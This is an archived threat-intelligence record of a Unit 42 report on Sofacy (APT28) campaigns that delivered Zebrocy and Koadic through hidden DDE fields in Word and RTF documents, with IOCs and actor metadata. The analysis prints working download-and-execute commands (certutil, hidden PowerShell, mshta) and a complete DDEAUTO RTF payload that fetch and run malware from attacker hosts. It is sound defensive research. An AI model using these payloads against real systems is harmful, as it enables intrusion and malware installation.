{ "id": "2df9bedf-a3ee-4d9f-88f7-601c29b5099d", "created_at": "2026-04-06T00:12:40.294943Z", "updated_at": "2026-04-10T03:37:50.434923Z", "deleted_at": null, "sha1_hash": "e7b98c3da0dac499cc422a26c19e2d2634a567e8", "title": "Sofacy Group’s Parallel Attacks", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 271861, "plain_text": "Sofacy Group’s Parallel Attacks\r\nBy Bryan Lee, Robert Falcone\r\nPublished: 2018-06-06 · Archived: 2026-04-05 12:53:19 UTC\r\nSummary\r\nThe Sofacy group remains a persistent global threat. Unit 42 and others have shown in the first half of 2018 how\r\nthis threat actor group continues to target multiple organizations throughout the world with a strong emphasis on\r\ngovernment, diplomatic and other strategic organizations primarily in North America and Europe.\r\nFollowing up our most recent Sofacy research in February and March of 2018, we have found a new campaign\r\nthat uses a lesser known tool widely attributed to the Sofacy group called Zebrocy. Zebrocy is delivered primarily\r\nvia phishing attacks that contain malicious Microsoft Office documents with macros as well as simple executable\r\nfile attachments. This third campaign is consistent with two previously reported attack campaigns in terms of\r\ntargeting: the targets were government organizations dealing with foreign affairs. In this case however the targets\r\nwere in different geopolitical regions.\r\nAn interesting difference we found in this newest campaign was that the attacks using Zebrocy cast a far wider net\r\nwithin the target organization: the attackers sent phishing emails to a an exponentially larger number of\r\nindividuals. The targeted individuals did not follow any significant pattern, and the email addresses were found\r\neasily using web search engines. This is a stark contrast with other attacks commonly associated with the Sofacy\r\ngroup where generally no more than a handful of victims are targeted within a single organization in a focus-fire\r\nstyle of attack.\r\nIn addition to the large number of Zebrocy attacks we discovered, we also observed instances of the Sofacy group\r\nleveraging the Dynamic Data Exchange (DDE) exploit technique previously documented by McAfee. The\r\ninstances we observed, however, used the DDE exploit to deliver different payloads than what was observed\r\npreviously. In one instance the DDE attack was used to deliver and install Zebrocy. In another instance, the DDE\r\nattack was used to deliver an open-source penetration testing toolkit called Koadic. The Sofacy group has\r\nleveraged open source or freely available tools and exploits in the past but this is the first time that Unit 42 has\r\nobserved them leveraging the Koadic toolkit.\r\nLinks to previous attacks\r\nIn our February report, we discovered the Sofacy group using Microsoft Office documents with malicious macros\r\nto deliver the SofacyCarberp payload to multiple government entities. In that report, we documented our\r\nobservation that the Sofacy group appeared to use conventional obfuscation techniques to mask their\r\ninfrastructure attribution by using random registrant and service provider information for each of their attacks. In\r\nparticular, we noted that the Sofacy group deployed a webpage on each of the domains. This is odd because\r\nattackers almost never set up an actual webpage on adversary C2 infrastructure. Even stranger, each webpage\r\ncontained the same content within the body. Since that report, we continued our research into this oddity. Using\r\nthis artifact, we were able to pivot and discover another attack campaign using the DealersChoice exploit kit with\r\nsimilar victimology to what we saw in February. Continuing to use this artifact, we discovered another domain\r\nwith the same content body, supservermgr[.]com. This domain was registered on December 20, 2017 and within a\r\nfew days was resolving to 92.222.136[.]105, which belonged to a well-known VPS provider often used by the\r\nhttps://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/\r\nPage 1 of 12\n\nSofacy group.\r\nUnfortunately, at the time of collection, the C2 domain had been sinkholed by a third party. Based on dynamic and\r\nstatic analysis of the malware sample associated with the supservermgr[.]com domain however, we were able to\r\ndetermine several unique artifacts which allowed us to expand our dataset and discover additional findings. First,\r\nwe determined the sample we collected, d697160ae… was attempting to communicate to its C2 at\r\nhxxp://supservermgr[.]com/sys/upd/pageupd.php to retrieve a Zebrocy AutoIT downloader. Because the domain\r\nhad been sinkholed, this activity could not be completed. However, we were able determine a unique, hard-coded\r\nuser agent used for the C2 communications:\r\nMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET\r\nCLR 3.0.04506.30; .NET CLR 3.0.04506.648; InfoPath.1)\r\nUsing AutoFocus, we pivoted from the user agent string to expand our data set to three additional Zebrocy\r\nsamples using the exact same user agent. This led us to additional infrastructure for Zebrocy at 185.25.51[.]198\r\nand 185.25.50[.]93. At this point we had collected nearly thirty samples of Zebrocy in relation to the original\r\nsample and its associated C2 domain. Additional pivoting based on artifacts unique to this malware family\r\nexpanded our dataset to hundreds of samples used over the last several years. Most of the additional samples were\r\nthe Delphi and AutoIT variants as reported by ESET. However, several of the collected samples were a C++\r\nvariant of the Zebrocy downloader tool. In addition, we discovered evidence of a completely different payload in\r\nKoadic being delivered as well. Also, we found the IP address 185.25.50[.]93 hosting C2 services for a Delphi\r\nbackdoor that ESET's report states is the final stage payload for these attacks.\r\nA Maltego chart diagramming the relational analysis we performed is below:\r\nFigure 1 Visualization of relationships\r\nhttps://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/\r\nPage 2 of 12\n\nPlease note this is not a comprehensive chart of all Zebrocy and Koadic samples we were able to collect. Only\r\nsamples mentioned or relevant to the relational analysis have been included.\r\nFrom the 185.25.50[.]93 C2 IP, we discovered another hard-coded user agent being used by Zebrocy:\r\nMozilla/5.0 (Windows NT 6.1; WOW64) WinHttp/1.6.3.8 (WinHTTP/5.1) like Gecko\r\nWe observed several samples of Zebrocy using this user agent targeting the foreign affairs ministry of a large\r\nCentral Asian nation. Pivoting off of this artifact provided us additional Zebrocy samples. One sample in\r\nparticular, cba5ab65a… used yet another unique user agent string in combination with the previous user agent for\r\nits C2:\r\nMozilla v5.1 (Windows NT 6.1; rv:6.0.1) Gecko/20100101 Firefox/6.0.1\r\nA malware sample using two separate unique user agent strings is uncommon. A closer examination of the tool\r\nrevealed the second user agent string was from a secondary payload that was retrieved by the cba5ab65a…\r\nsample. Pivoting from the Mozilla v5.1 user agent revealed over forty additional Zebrocy samples, with several\r\nagain targeting the same Central Asian nation. Two samples specifically, 25f0d1cbc… and 115fd8c61… provided\r\nadditional artifacts we were able to pivot from to discover weaponized documents to deliver Zebrocy as well as a\r\nKoadic.\r\nExamining the use of the unique user agents’ strings over time shows that while previously only the Mozilla/5.0\r\nuser agent was in use, since mid 2017 all three user agent strings have been used by the Zebrocy tool for its C2\r\ncommunications.\r\nFigure 2 Timeline of User Agents\r\nDDE Documents\r\nThe two weaponized documents we discovered leveraging DDE were of particular interest due to victimology and\r\na change in tactics.\r\nWhile examining 25f0d1cbc…, we were able to pivot from its C2  220.158.216[.]127 to gather additional Zebrocy\r\nsamples as well as a weaponized document. This document (85da72c7d…) appears to have been targeting a North\r\nAmerican government organization dealing with foreign affairs. It leveraged DDE to retrieve and install a payload\r\nonto the victim host. A decoy document is deployed in this attack, with the contents purporting be a publicly\r\nhttps://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/\r\nPage 3 of 12\n\navailable document from the United Nations regarding the Republic of Uzbekistan.\r\nFigure 3 Example of delivery document\r\nhttps://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/\r\nPage 4 of 12\n\nFigure 4 Lure image used\r\nThe creator of the weaponized document appended their DDE instructions to the end of the document after all of\r\nthe decoy contents. When the document is opened in Word, the instructions are not immediately visible, as Word\r\ndoes not display these fields contents by default. As you can see in the following screenshot, simply attempting to\r\nhighlight the lines in which the DDE instructions reside does not display them.\r\nhttps://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/\r\nPage 5 of 12\n\nFigure\r\n5 Hidden DDE commands\r\nEnabling the “Toggle Field Codes” feature reveals the DDE instructions to us and shows that the author had set\r\ninstructions to size 1 font and with a white coloring. The use of a white font coloring to hide contents within a\r\nweaponized document is a technique we had previously reported being used by the Sofacy group in a malicious\r\nmacro attack.\r\nThe DDE instructions attempt to run the following the following command on the victim host, which attempts to\r\ndownload and execute a payload from a remote server:\r\nC:\\\\Programs\\\\Microsoft\\\\MSOffice\\\\Word.exe\\\\..\\\\..\\\\..\\\\..\\\\Windows\\\\\r\nSystem32\\\\rundll32.exe\r\nC:\\\\Windows\\\\System32\\\\shell32.dll,ShellExec_RunDLL\r\nC:\\\\Windows\\\\System32\\\\cmd.exe /k certutil -urlcache -split -f\r\nhxxp://220.158.216[.]127/MScertificate.exe \u0026 MScertificate.exe\"\r\nDuring our analysis, we observed this DDE downloading and executing a Zebrocy AutoIt downloader\r\n(f27836430…), configured to attempt to download an additional payload from 220.158.216[.]127. The DDE\r\ninstructions also included another command that it did not run, which suggests it is an artifact of a prior version of\r\nthis delivery document. The following shows this unused command, which exposed an additional server within\r\nSofacy’s infrastructure would download and execute an encoded PowerShell script from 92.114.92[.]102:\r\nC:\\\\Programs\\\\Microsoft\\\\MSOffice\\\\Word.exe\\\\..\\\\..\\\\..\\\\..\\\\Windows\\\\\r\nSystem32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe -NoP -sta -NonI -W\r\nhidden $e=(New-Object\r\nSystem.Net.webClient).downloadString('hxxp://92.114.92[.]102:80/d');po\r\nwershell -enc $e #\r\nThe unused command above appears to be related to previous attacks, specifically attacks that occurred in\r\nNovember 2017 as discussed by McAfee and ESET. The payload delivered in these November 2017 attacks using\r\nDDE enabled documents was SofacyCarberp, which differs from the Zebrocy downloader delivered in the\r\nhttps://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/\r\nPage 6 of 12\n\nFebruary 2018 attacks.\r\n115fd8c61… was another Zebrocy sample we were able to pivot from by gathering additional samples connecting\r\nto its C2 86.106.131[.]177. The additional samples targeted the same large Central Asian nation state as previously\r\nmentioned but more interestingly, one of the samples was a weaponized document also leveraging DDE and\r\ncontaining a non-Zebrocy payload. The payload turned out to be an open source penetration test toolkit called\r\nKoadic. It is a toolkit similar to Metasploit or PowerShell Empire and is freely available to anyone on Github.\r\nFigure 6 Example of delivery document\r\nThe RTF document (8cf3bc2bf...) was very small in size at 264 bytes, which can be seen in its entirety here:\r\n{\\rtf1{\\field{\\*\\fldinst DDEAUTO \"C:\\\\\\\\WIndowS\\\\\\\\SYsTem32\\\\\\\\cMD.eXe\r\n\" \"/C POWErsHELl.eXE  -ex     BypaSs  -NOP -w      HIdDen  (NEw-oBjeCT SyStEm.NET.weBCLiENT).dowNloADFILe(\r\nhttps://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/\r\nPage 7 of 12\n\n'hxxp://86.106.131[.]177/link/GRAPH.EXE'\r\n  ,       '%apPDAtA%\\graph.exe'   )   ;       saps\r\n    '%Appdata%\\graph.exe'\"}}}\r\nThe contents above use the DDE functionality in Microsoft Word to run a PowerShell script to download the\r\nKoadic payload from a remote server, save it as an executable file on the system and then execute the payload.\r\nConclusion\r\nThe Sofacy group continues their targeted attack campaigns in 2018. As mentioned in this blog, Sofacy is carrying\r\nout parallel campaigns to attack similar targets around the world but with different toolsets. The Zebrocy tool\r\nassociated with this current strain of attacks is constructed in several different forms based on the programming\r\nlanguage the developer chose to create the tool. We have observed Delphi, AutoIt, and C++ variants of Zebrocy,\r\nall of which are related not only in their functionality, but also at times by chaining the variants together in a single\r\nattack. These attacks are still largely perpetrated via spear phishing campaigns, whether via simple executable\r\nattachments in hopes that a victim will launch the file to using a previously observed DDE exploitation technique.\r\nPalo Alto Networks customers are protected from Zebrocy and Koadic attacks by:\r\nAll known Zebrocy samples have a malicious verdict in WildFire\r\nAutoFocus customers can track this campaign with the following Tags:\r\nZebrocy\r\nKoadic\r\nAppendix\r\nZebrocy C++ Variant\r\nOn February 19, 2018, we saw a spear phishing email sent to a foreign affairs organization within a Central Asian\r\ncountry, which attempted to delivered an attached Zebrocy downloader (5b5e80f63...) written in the Delphi\r\nprogramming language. This downloader obtained a second downloader, which in this case was very similar in\r\nfunctionality but was written in C++ instead of Delphi.\r\nThis variation of the Zebrocy downloader begins by gathering the serial number for the storage volume with the\r\nlabel \"C:\\\" and the computer name. It then creates an invisible window (0x0 pixel) in the bottom right corner of\r\nthe screen, which will call the main function of the Trojan.\r\nThe main function of the Trojan interacts with its configured C2 server to obtain additional code to execute. The\r\nmain function gets pertinent strings to communicate with its C2 by calling a sub-function with a specific number\r\nthat the sub-function uses as a case within a switch statement to decrypt the desired string. For instance, here are\r\nthe resulting decrypted strings from each of the case statements (dd7e69e1...):\r\nCase - String decrypted\r\n1 - 185.25.50[.]93\r\n2 - POST http://185.25.50[.]93/syshelp/kd8812u/protocol.php HTTP/1.1\\r\\nHost: 185.25.50[.]93\\r\\nContent-Type:\r\napplication/x-www-form-urlencoded\\r\\nContent-Length:\r\n3 - porg=\r\n4 - Content-Length:\r\nThe Trojan uses raw sockets to communicate with its C2 server and uses the decrypted string above to create\r\nhttps://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/\r\nPage 8 of 12\n\nHTTP requests. It starts by calling this specific sub-function with an argument of 1 to get the IP address for the C2\nto connect. It then calls the subfunction with the argument of 2 to get the string that it will use as the HTTP POST\nrequest. The main function then calls the subfunction with the argument 3 to get the POST data parameter\n(“porg”) along with the volume serial number and computer name and will send this data to the C2 via the HTTP\nPOST request. The resulting HTTP POST request looks like the following:\nPOST http://185.25.50[.]93/syshelp/kd8812u/protocol.php HTTP/1.1\nHost: 185.25.50[.]93\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 21\nporg=44908AE0524f422d\nWe have not seen a C2 server respond to our requests during our analysis, however, we do know how the Trojan\nwill parse the C2's response for specific data.\n-1 - Deletes the buffer and exits the Trojan.\n009 - Deletes the buffers and exits the Trojan.\nIf neither of the above values are found at the beginning of the HTTP response, the Trojan checks the C2 response\nfor the ASCII representation of hexadecimal bytes. The Trojan will convert these hexadecimal bytes to their\nbinary values and write them to a file and will run the file using the \"open\" function using the ShellExecuteW API\nfunction.\nWe have seen the following HTTP POST parameters within the Zebrocy C++ samples:\nporg\nstructOne\noq\nvolume\nDDE Details\nThe author of the DDE document used in the February 2018 attacks used some obfuscation techniques in an\nattempt to evade detection. First, the DDE instructions heavily rely on the QUOTE field, which converts decimal\nvalues to their ASCII equivalent character. Also, the author capitalized the “E” in the “dde” command to evade\ncase sensitive signatures. Lastly, the author bolded the “dd” characters within the “dde” command, which breaks\nthe string up within the XML of the DOCX file (word/document.xml) to make signature development difficult, as\nseen here:\n1\n2\n3\n4\n5\n6\n7\nhttps://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/\nPage 9 of 12\n\n8\n9\n10\n11\n12\n13\n14\n15\n16\n17\n18 ddE In addition to the aforementioned DOCX file, we found another related DDE enabled document based on an\ninfrastructure overlap with a Zebrocy C2 IP address. This related delivery document was an RTF file that\ndownloaded and installed a payload used to load the open-source Koadic tool. We do not have telemetry on the\ntarget or attack vector, but we know the RTF file used DDE to download and execute an executable that loaded\nKoadic.\nThe payload (abbad7acd...) is an executable that appears to have been created by a VBScript to Executable tool\nand further obfuscated with a cryptor. Our analysis shows some possible ties to the Vbs to Exe tool by F2KO\nSoftware but we have yet to confirm a direct overlap. We believe the actor used a cryptor on the payload, as it\nobtains a filename and script from within its resources and decodes these resources by multiplying each byte by\nnegative one. The payload then uses the MD5 hash (14331d289e737093994395d3fc412afc) of what appears to be\na hardcoded SHA1 hash (B6A75B1EF701710D7AEADE0FE93DE8477F3BD506) as an RC4 key to decrypts the\nresulting decoded data. For instance, the following data exists within a resource:\nfb 70 b0 c9 bd c5 8a d4 0c 54 fd 4c 6d bb f0 0f\nBy multiplying each byte with -1, we obtain the following data:\n05 90 50 37 43 3b 76 2c f4 ac 03 b4 93 45 10 f1\nAfter using RC4 and the key 14331d289e737093994395d3fc412afc, the following cleartext data appears:\n\\x00\\x00\\x00\\x00FlashRun.vbs\nWe do not see the payload using this FlashRun.vbs filename, instead it uses a temporary file name to store an\nembedded VBScript file, such as %Temp%\\4.tmp\\5.vbs. The embedded VBScript is retrieved from a resource and\ndecrypted using the same algorithm as discussed above, which results in the following cleartext:\nset objshell = createobject(\\\"wscript.shell\\\")\nhttps://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/\nPage 10 of 12\n\nobjshell.run \\\"mshta hxxp://86.106.131.177:6500/zIZFh\\\",vbhide\r\nThe Koadic C2 server will respond to this request with Javascript code that acts as the Koadic staging payload,\r\nwhich allows the actor to run additional Koadic modules on the end system to carry out their post-exploitation\r\nactivities. Unfortunately, we did not observe the Koadic modules used by Sofacy during out analysis.\r\nIOCs\r\nDomain\r\nsupservermgr[.]com\r\nURL\r\nhxxp://supservermgr[.]com/sys/upd/pageupd.php\r\nZebrocy\r\nd697160aecf152a81a89a6b5a7d9e1b8b5e121724038c676157ac72f20364edc\r\ncba5ab65a24be52214736bc1a5bc984953a9c15d0a3826d5b15e94036e5497df\r\n25f0d1cbcc53d8cfd6d848e12895ce376fbbfaf279be591774b28f70852a4fd8\r\n115fd8c619fa173622c7a1e84efdf6fed08a25d3ca3095404dcbd5ac3deb1f03\r\nf27836430742c9e014e1b080d89c47e43db299c2e00d0c0801a2830b41b57bc1\r\n5b5e80f63c04402d0b282e95e32155b2f86cf604a6837853ab467111d4ac15e2\r\ndd7e69e14c88972ac173132b90b3f4bfb2d1faec15cca256a256dd3a12b6e75d\r\nKoadic\r\nabbad7acd50754f096fdc6551e728aa6054dcf8e55946f90a02b17db552471ca\r\nUser Agents\r\nMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET\r\nCLR 3.0.04506.30; .NET CLR 3.0.04506.648; InfoPath.1)\r\nMozilla/5.0 (Windows NT 6.1; WOW64) WinHttp/1.6.3.8 (WinHTTP/5.1) like Gecko\r\nMozilla v5.1 (Windows NT 6.1; rv:6.0.1) Gecko/20100101 Firefox/6.0.1\r\nIPs\r\n185.25.51[.]198\r\n185.25.50[.]93\r\n220.158.216[.]127\r\n92.114.92[.]102\r\n86.106.131[.]177\r\nDDE Docs\r\nhttps://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/\r\nPage 11 of 12\n\n85da72c7dbf5da543e10f3f806afd4ebf133f27b6af7859aded2c3a6eced2fd5\r\n8cf3bc2bf36342e844e9c8108393562538a9af2a1011c80bb46416c0572c86ff\r\nSource: https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/\r\nhttps://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/\r\nPage 12 of 12", "extraction_quality": 1, "language": "EN", "sources": [ "MITRE", "Malpedia", "ETDA" ], "references": [ "https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/" ], "report_names": [ "unit42-sofacy-groups-parallel-attacks" ], "threat_actors": [ { "id": "730dfa6e-572d-473c-9267-ea1597d1a42b", "created_at": "2023-01-06T13:46:38.389985Z", "updated_at": "2026-04-10T02:00:02.954105Z", "deleted_at": null, "main_name": "APT28", "aliases": [ "Pawn Storm", "ATK5", "Fighting Ursa", "Blue Athena", "TA422", "T-APT-12", "APT-C-20", "UAC-0001", "IRON TWILIGHT", "SIG40", "UAC-0028", "Sofacy", "BlueDelta", "Fancy Bear", "GruesomeLarch", "Group 74", "ITG05", "FROZENLAKE", "Forest Blizzard", "FANCY BEAR", "Sednit", "SNAKEMACKEREL", "Tsar Team", "TG-4127", "STRONTIUM", "Grizzly Steppe", "G0007" ], "source_name": "MISPGALAXY:APT28", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "e3767160-695d-4360-8b2e-d5274db3f7cd", "created_at": "2022-10-25T16:47:55.914348Z", "updated_at": "2026-04-10T02:00:03.610018Z", "deleted_at": null, "main_name": "IRON TWILIGHT", "aliases": [ "APT28 ", "ATK5 ", "Blue Athena ", "BlueDelta ", "FROZENLAKE ", "Fancy Bear ", "Fighting Ursa ", "Forest Blizzard ", "GRAPHITE ", "Group 74 ", "PawnStorm ", "STRONTIUM ", "Sednit ", "Snakemackerel ", "Sofacy ", "TA422 ", "TG-4127 ", "Tsar Team ", "UAC-0001 " ], "source_name": "Secureworks:IRON TWILIGHT", "tools": [ "Downdelph", "EVILTOSS", "SEDUPLOADER", "SHARPFRONT" ], "source_id": "Secureworks", "reports": null }, { "id": "ae320ed7-9a63-42ed-944b-44ada7313495", "created_at": "2022-10-25T15:50:23.671663Z", "updated_at": "2026-04-10T02:00:05.283292Z", "deleted_at": null, "main_name": "APT28", "aliases": [ "APT28", "IRON TWILIGHT", "SNAKEMACKEREL", "Group 74", "Sednit", "Sofacy", "Pawn Storm", "Fancy Bear", "STRONTIUM", "Tsar Team", "Threat Group-4127", "TG-4127", "Forest Blizzard", "FROZENLAKE", "GruesomeLarch" ], "source_name": "MITRE:APT28", "tools": [ "Wevtutil", "certutil", "Forfiles", "DealersChoice", "Mimikatz", "ADVSTORESHELL", "Komplex", "HIDEDRV", "JHUHUGIT", "Koadic", "Winexe", "cipher.exe", "XTunnel", "Drovorub", "CORESHELL", "OLDBAIT", "Downdelph", "XAgentOSX", "USBStealer", "Zebrocy", "reGeorg", "Fysbis", "LoJax" ], "source_id": "MITRE", "reports": null }, { "id": "d2516b8e-e74f-490d-8a15-43ad6763c7ab", "created_at": "2022-10-25T16:07:24.212584Z", "updated_at": "2026-04-10T02:00:04.900038Z", "deleted_at": null, "main_name": "Sofacy", "aliases": [ "APT 28", "ATK 5", "Blue Athena", "BlueDelta", "FROZENLAKE", "Fancy Bear", "Fighting Ursa", "Forest Blizzard", "G0007", "Grey-Cloud", "Grizzly Steppe", "Group 74", "GruesomeLarch", "ITG05", "Iron Twilight", "Operation DealersChoice", "Operation Dear Joohn", "Operation Komplex", "Operation Pawn Storm", "Operation RoundPress", "Operation Russian Doll", "Operation Steal-It", "Pawn Storm", "SIG40", "Sednit", "Snakemackerel", "Sofacy", "Strontium", "T-APT-12", "TA422", "TAG-0700", "TAG-110", "TG-4127", "Tsar Team", "UAC-0028", "UAC-0063" ], "source_name": "ETDA:Sofacy", "tools": [ "ADVSTORESHELL", "AZZY", "Backdoor.SofacyX", "CHERRYSPY", "CORESHELL", "Carberp", "Computrace", "DealersChoice", "Delphacy", "Downdelph", "Downrage", "Drovorub", "EVILTOSS", "Foozer", "GAMEFISH", "GooseEgg", "Graphite", "HATVIBE", "HIDEDRV", "Headlace", "Impacket", "JHUHUGIT", "JKEYSKW", "Koadic", "Komplex", "LOLBAS", "LOLBins", "Living off the Land", "LoJack", "LoJax", "MASEPIE", "Mimikatz", "NETUI", "Nimcy", "OCEANMAP", "OLDBAIT", "PocoDown", "PocoDownloader", "Popr-d30", "ProcDump", "PythocyDbg", "SMBExec", "SOURFACE", "SPLM", "STEELHOOK", "Sasfis", "Sedkit", "Sednit", "Sedreco", "Seduploader", "Shunnael", "SkinnyBoy", "Sofacy", "SofacyCarberp", "SpiderLabs Responder", "Trojan.Shunnael", "Trojan.Sofacy", "USB Stealer", "USBStealer", "VPNFilter", "Win32/USBStealer", "WinIDS", "Winexe", "X-Agent", "X-Tunnel", "XAPS", "XTunnel", "Xagent", "Zebrocy", "Zekapab", "carberplike", "certutil", "certutil.exe", "fysbis", "webhp" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434360, "ts_updated_at": 1775792270, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/e7b98c3da0dac499cc422a26c19e2d2634a567e8.pdf", "text": "https://archive.orkl.eu/e7b98c3da0dac499cc422a26c19e2d2634a567e8.txt", "img": "https://archive.orkl.eu/e7b98c3da0dac499cc422a26c19e2d2634a567e8.jpg" } }